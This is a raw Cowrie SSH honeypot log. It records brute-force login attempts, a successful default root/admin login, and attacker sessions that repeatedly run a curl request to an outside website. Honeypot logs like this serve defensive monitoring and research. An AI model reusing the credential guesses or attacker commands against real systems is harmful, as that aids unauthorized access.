{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:58.414616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:00.715437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:00.716174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:03.064363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:03.065179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:05.311761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:05.312606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:08.172219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:08.173483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:10.517362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:10.518235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:12.798450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:12.799261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:15.236395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:15.239141Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:17.438258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:17.439301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:19.341437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:19.342286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:21.395259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:21.396523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:23.303969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:23.304842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:25.534247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:25.535182Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:27.589172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:27.590035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:44:29.285514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.286351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.732861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.733951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"19.2","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 19.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.734865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"16.9","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 16.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.736907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"14.5","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 14.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.737641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"12.3","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.738746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"10.4","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.739753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"8.3","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.740520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"6.4","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.741729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","size":0,"shasum":"9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5","duplicate":true,"duration":"4.2","message":"Closing TTY Log: var/lib/cowrie/tty/9b33a89a9cecd96ebb706d2fbd69b7b2a123d9fa5908912e976ca2757a0995c5 after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.742512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"299.3","message":"Connection lost after 299.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:44:29.743466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":47566,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea4724cd19ac","protocol":"ssh","message":"New connection: 80.94.95.15:47566 (1.2.3.4:22) [session: ea4724cd19ac]","sensor":"my-vps","timestamp":"2025-08-28T07:44:59.281314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:44:59.282361Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:44:59.334091Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T07:44:59.620732Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc123","message":"login attempt [oscar/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:45:00.690700Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd123","message":"login attempt [oscar/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:45:01.745515Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd1234","message":"login attempt [oscar/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:45:02.799796Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc1234","message":"login attempt [oscar/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:45:03.853463Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:45:04.914006Z","src_ip":"80.94.95.15","session":"ea4724cd19ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42518,"dst_ip":"1.2.3.4","dst_port":22,"session":"c961b2cf6ae4","protocol":"ssh","message":"New connection: 212.227.125.160:42518 (1.2.3.4:22) [session: c961b2cf6ae4]","sensor":"my-vps","timestamp":"2025-08-28T07:45:23.474012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-08-28T07:45:23.474780Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-08-28T07:45:23.609219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:45:24.402465Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.190103Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.190953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.481942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.482785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.540025Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.540859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.822621Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.823601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.893950Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.894843Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:25.955353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:25.956150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.259402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.260204Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.330245Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.331023Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.391327Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.392144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.723135Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.723938Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.771835Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.772711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.837787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.838646Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.875143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.876013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.919494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.920567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:26.963280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:26.963925Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.000991Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.001787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.038834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.039774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.080799Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.081587Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.119133Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.119834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.157886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.158643Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.198548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.199290Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.237872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:27.238992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:27.279486Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
